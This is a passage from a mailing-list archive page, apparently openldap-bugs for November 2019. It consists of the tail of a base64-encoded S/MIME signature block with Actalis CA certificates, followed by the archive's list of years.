aXMlMjBDbGllbnQlMjBBdXRoZW50aWNhdGlvbiUyMENBJTIwRzEsbyUzZEFjdGFsaXMlMjBT LnAuQS4vMDMzNTg1MjA5NjcsYyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7Ymlu YXJ5MD2gO6A5hjdodHRwOi8vY3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEhDTC1H MS9nZXRMYXN0Q1JMMB0GA1UdDgQWBBSM25yar8W0HyQ52pQLvwam2PQI1zAOBgNVHQ8BAf8E BAMCBaAwDQYJKoZIhvcNAQELBQADggEBADvK449WtB/GFtNr0TNrTnaNbtSuPz5poGt7nyUb neGYazzxvjBPI0a0A+h/++rHcAuYrCNP+/M0PWU3Jv4IDf6YwHGRQdXN4f9xhCtmBnFtfQ22 9anlEBvLZv5uEQSzZ6qhvZkqnq9WQ/ofb9q2GGwPfKa+QM4T8QFv5ZmogdXriH3gf4gJ1fbW 7Ig33y+xYXr8W4lQ3haAShGzV/FleypHafb/3ptGWNq3+diGKPxNpyU1BMq904OPAEBMCa5i 8+8kYsT8ug+t2uSqboWrutgr/y4bYxBrY56cdfgnLBqoHPEBkg8ONHMgiULphoOelPbOjHD0 by5aiDvNToIkdX4wggZHMIIEL6ADAgECAggs1IrTsR4PiTANBgkqhkiG9w0BAQsFADBrMQsw CQYDVQQGEwJJVDEOMAwGA1UEBwwFTWlsYW4xIzAhBgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAz MzU4NTIwOTY3MScwJQYDVQQDDB5BY3RhbGlzIEF1dGhlbnRpY2F0aW9uIFJvb3QgQ0EwHhcN MTUwNTE0MDcxNDE1WhcNMzAwNTE0MDcxNDE1WjCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgM Bk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1 ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzEw ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDA/MGJVtmI4vQEZb/NCTWrKCkw/gzK 9yerHBHuhj1d5PVsRLYMVzOVl96Iio0tqduTKpPHJ1dn6TGhL3TvWpaxnrNL6nFKpcuz5FO+ d0RpbHmF0dlwo1YbOHLkWI7gZm8aUUicUSJpj504SmONa9J5em9wOmdjDoz0Be4ejgmGMLc/ 84r//lAVefO1NriJTrpGku145OAK2JELBk0rHwQV6qp9Oli98Rvgf3UTuf5jrWObR3YTx8nb AZNpJLCNzydMjYCle6OhzO6RvaQerBoY/erlS551ZydFlzrldSEr9norfYq+tC40/fYX/kzG S8QOcmlSee32IwTG8TOffXMNAgMBAAGjggHVMIIB0TBBBggrBgEFBQcBAQQ1MDMwMQYIKwYB BQUHMAGGJWh0dHA6Ly9vY3NwMDUuYWN0YWxpcy5pdC9WQS9BVVRILVJPT1QwHQYDVR0OBBYE FH5g/Phspz09166ToXkCj7N0KTv1MA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUUtiI OsifeGbtifN7OHCUyQICNtAwRQYDVR0gBD4wPDA6BgRVHSAAMDIwMAYIKwYBBQUHAgEWJGh0 dHBzOi8vd3d3LmFjdGFsaXMuaXQvYXJlYS1kb3dubG9hZDCB4wYDVR0fBIHbMIHYMIGWoIGT oIGQhoGNbGRhcDovL2xkYXAwNS5hY3RhbGlzLml0L2NuJTNkQWN0YWxpcyUyMEF1dGhlbnRp Y2F0aW9uJTIwUm9vdCUyMENBLG8lM2RBY3RhbGlzJTIwUy5wLkEuJTJmMDMzNTg1MjA5Njcs YyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7YmluYXJ5MD2gO6A5hjdodHRwOi8v Y3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEgtUk9PVC9nZXRMYXN0Q1JMMA4GA1Ud DwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEATZPO1SS+QRtKFlhzX2WJ8tl6PliMvMvE D+VbFmeywUukM/JJ/Myad3PcXTpLnWW3AN75uVPByl3NSXczZqUofds6vznmS71Gvq553Jr4 cZBRPQ6GoOjYrYIAT2cFx8A3GJ+N9PxfMKgLdy1/27HeiDVa4TxZNwtkqAIy41EGYm170LhS DTDeJeo/Orwq5FGhs0qp10+OTcSIr5AD4QUIKRrXE4uH/tw8ZMkw21rX/S7mguJdo4Ad4Au3 +ep5naRn6WLMryhO/iKflq8h/d6Vregvq+vClNxrtNnFNf3R7zTl1lA3ipFU909usGVa02jM ftJ0t4utyg3yXYRc7rX3QYAlh3KdNzYToTKstUZwMpRf3VWYJJGuoSmlntbTlNtZEuLr7A+M DOZOrZdKYp9qOruO5MqCSTDsUUkHKLFrQ11Jmix1BvdWQuobwQ5g5qZkuof6/u5rT66WDsU6 +IVt5nthH15E7zU7wULW4uC62XIYPb4YuOBCey+d4Oxs0BZ+SivL6qoDG9XNfk9JpCnaknnY BogfUw3WLb+B5FI/zdNEysWTC4gzMOFfEoVC+myk1zX29xOvLOO3A/jGrRY1LhhY9LhT72Zb 5TQKCeyDH18yIk1st+V/mpJvnePcAYeeMr+onM9rf3AVNctcHrjwXfDVB/1Ht5l5NEl8JBj9 8lQxggP2MIID8gIBATCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0G A1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoG A1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W 2P8IBRUwDQYJYIZIAWUDBAIBBQCgggIvMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJ KoZIhvcNAQkFMQ8XDTE5MTEyODE0NTcyOFowLwYJKoZIhvcNAQkEMSIEIHUgVVi6K2dKIEB0 tQPAbVjXtxS4Yclx3hZ+5dWLZu3HMGwGCSqGSIb3DQEJDzFfMF0wCwYJYIZIAWUDBAEqMAsG CWCGSAFlAwQBAjAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAw BwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgagGCSsGAQQBgjcQBDGBmjCBlzCBgjELMAkGA1UE BhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3Rh bGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVu dGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwgaoGCyqGSIb3DQEJEAILMYGaoIGX MIGCMQswCQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAh BgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENs aWVudCBBdXRoZW50aWNhdGlvbiBDQSBHMQIQXKpTmLFIqV4YH1bY/wgFFTANBgkqhkiG9w0B AQEFAASCAQAHG9hr/YziBS5vLwu+YsqEyjBAmDAXvDLJ2ZVf31HYOwRwSopLkP6E8/c21bae k9ibkGG/Co6pKyLnu3fbtzuZhRgYeLmQxtClssE/v5odKbOvd4nxSwcaZFQc+/J38IHvtXWb OExAhUG13SecR5Ovc8YIM+3kmY9ReEqqv8q6RV9sKk3dwIpkkoSsedBeD4YPjP62BqYC92TQ SXcN6BPiJqILJcCCkWPxAjjxdQVUylQW/3w5QGlmQRA1ovBXc93dijfAN+6QypO7PzWiCvXm xLVM4T4AbiZlQvhGA+beTYVrhrlLW3gqOCZeFIXBjnHTYAcJAiJ9jY66UywZMsVNAAAAAAAA --------------ms000905070707070901010503--

1 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

openldap-bugs November 2019